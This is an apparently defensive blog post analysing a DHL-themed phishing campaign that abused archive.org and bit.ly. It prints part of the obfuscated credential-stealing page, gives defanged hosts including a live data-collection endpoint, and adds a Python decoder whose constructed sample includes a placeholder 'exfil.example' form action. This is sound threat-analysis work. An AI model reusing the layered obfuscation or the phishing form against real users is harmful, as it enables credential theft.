The Internet Archive is a well-known website, best known for its “Wayback Machine” service, which lets you search for and display old versions of websites. Its current Alexa ranking is 262, which makes it a “popular and trusted” website. Indeed, as I explained in a recent SANS ISC diary, whitelisted websites are very valuable to attackers! The phishing attempt that I detected was also using the URL shortener bit.ly (position 9380 in the Alexa list).
The phishing campaign is based on a fake DHL notification email. The mail has a PDF attached to it:
This PDF has no malicious content and is therefore not blocked by antispam/antivirus. The link “Click here” points to a bit.ly short URL:
hxxps://bitly.com/2jXl8GJ
Note that HTTPS is used, which already means that many security solutions will not inspect the traffic.
Tip: If you append a “+” at the end of a bit.ly URL, bit.ly will not redirect you straight to the hidden URL but will display an information page where you can read it!
The URL behind the short URL is:
hxxps://archive.org/download/gxzdhsh/gxzdhsh.html
Bit.ly also maintains statistics about the visitors:
It’s impressive to see how many people visited the malicious link. The phishing campaign has also been active since the end of March. Thank you bit.ly for this useful information!
This URL returns the following HTML code:
<html> <head> <title></title> <META http-equiv="refresh" content="0;URL=data:text/html;base64, ... (base64 data) ... "> </head> <body bgcolor="#fffff"> <center> </center> </body> </html>
Once decoded, the base64 content of the META refresh tag is the following HTML:
<script language="Javascript"> document.write(unescape('%0A%3C%68%74%6D%6C%20%68%6F%6C%61%5F%65%78%74%5F%69%6E%6A%65%63%74%3D%22%69%6E%69%74%65%64%22%3E%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%63%6F%6E%74%65%6E%74%2D%74%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%77%69%6E%64%6F%77%73%2D%31%32%35%32%22%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%68%6F%72%74%63%75%74%20%69%63%6F%6E%22%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%68%6C%2E%63%6F%6D%2F%69%6D%67%2F%66%61%76%69%63%6F%6E%2E%67%69%6 ... %3E%0A%09%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%65%64%61%67%72%6F%6C%74%64%2E%63%6F%6D%2F%6D%6F%62%2F%44%48%4C%5F%66%69%6C%65%73%2F%61%6C%69%62%61%62%61%2E%70%6E%67%22%20%68%65%69%67%68%74%3D%22%32%37%22%20%0A%0A%77%69%64%74%68%3D%22%31%33%30%22%3E%0A%09%3C%2F%74%64%3E%0A%0A%09%3C%2F%74%72%3E%3C%2F%74%62%6F%64%79%3E%3C%2F%74%61%62%6C%65%3E%3C%2F%74%64%3E%3C%2F%74%72%3E%0A%0A%0A%0A%0A%3C%74%72%3E%3C%74%64%20%68%65%69%67%68%74%3D%22%35%25%22%20%62%67%63%6F%6C%6F%72%3D%22%23%30%30%30%30%30%30%22%3E%0A%3C%2F%74%64%3E%3C%2F%74%72%3E%0A%0A%3C%2F%74%62%6F%64%79%3E%3C%2F%74%61%62%6C%65%3E%0A%0A%0A%0A%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E')); </Script>
The deobfuscated script displays the following page:
The pictures are loaded from a remote website, which has already been cleaned up:
hxxp://www.fedagroltd.com/mob/DHL_files/
Stolen data are sent to another website (this one is still alive):
hxxp://www.magnacartapeace.org.ng/wp/stevedhl/kenbeet.php
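To analyse this kind of page without opening it in a browser, the three layers described above (META refresh to a base64 data: URI, then a document.write(unescape('...')) call, then the final HTML whose <img> and <form> tags reveal the image host and the endpoint receiving the stolen data) can be peeled off statically. The following is an added example written for this post, not the attacker's code nor a tool from the original article; the sample page it decodes is constructed inline with placeholder .example hosts, and it also tolerates the whitespace that line wrapping inserts into the %XX run.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample (not the captured page) mimicking its three stages: an HTML
# wrapper whose META refresh points at a base64 data: URI, which carries a
# document.write(unescape('...')) call that decodes to the final phishing form.
FINAL_HTML = (
    '<html><head><link rel="shortcut icon" href="http://brand.example/favicon.ico">'
    '</head><body><form action="http://exfil.example/collect.php" method="post">'
    '<img src="http://images.example/logo.png"><input name="email"></form></body></html>'
)
_escaped = "".join("%%%02X" % b for b in FINAL_HTML.encode("utf-8"))
STAGE2 = "<script language=\"Javascript\"> document.write(unescape('%s')); </script>" % _escaped
SAMPLE_PAGE = (
    '<html><head><title></title><META http-equiv="refresh" content="0;URL=data:text/html;base64,'
    + base64.b64encode(STAGE2.encode()).decode() + '"></head>'
    '<body bgcolor="#fffff"><center></center></body></html>'
)

def decode_refresh_data_uri(page: str) -> str:
    """Extract the base64 data: URI from the META refresh tag and decode it."""
    m = re.search(r'URL=data:text/html;base64,\s*([A-Za-z0-9+/=\s]+)"', page, re.I)
    if not m:
        raise ValueError("no base64 data: URI in a META refresh")
    return base64.b64decode(re.sub(r"\s+", "", m.group(1))).decode("utf-8", "replace")

def decode_unescape_payload(script: str) -> str:
    """Recover the HTML handed to JavaScript unescape(); whitespace that line
    wrapping inserted into the %XX run (as in the captured sample) is dropped."""
    m = re.search(r"unescape\('([^']*)'\)", script, re.I)
    if not m:
        raise ValueError("no unescape() call found")
    return unquote(re.sub(r"\s+", "", m.group(1)))

def extract_indicators(html: str) -> dict:
    """Remote resources the decoded page touches: image hosts and the form
    action that receives the stolen credentials."""
    return {
        "form_actions": re.findall(r'<form[^>]*\baction="([^"]+)"', html, re.I),
        "img_srcs": re.findall(r'<img[^>]*\bsrc="([^"]+)"', html, re.I),
    }

def analyse(page: str) -> dict:
    """Run the full chain: META refresh -> base64 -> unescape -> indicators."""
    return extract_indicators(decode_unescape_payload(decode_refresh_data_uri(page)))

if __name__ == "__main__":
    for kind, urls in analyse(SAMPLE_PAGE).items():
        print(kind, urls)
```

Pointing analyse() at the saved .html of a real page gives the same two lists, which are the values to block or hunt for in proxy logs.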
The question is: how was this phishing page stored on archive.org? If you visit the upper level of the malicious URL (https://archive.org/download/gxzdhsh/), you find this:
Go up one more directory (‘../’) and you will find the owner of this page: alextray. This user has many phishing pages available:
Indeed, the Internet Archive website allows registered users to upload content, as stated in its FAQ. If you search for ‘archive.org/download’ on Google, you will find many references to uploaded content (most of it harmless), but on VirusTotal there are references to malicious content hosted on archive.org.
Here is the list of phishing sites hosted by “alextray”. You can use them as IOCs:
The post “Archive.org Abused to Deliver Phishing Pages” was first published on /dev/random.
from Xavier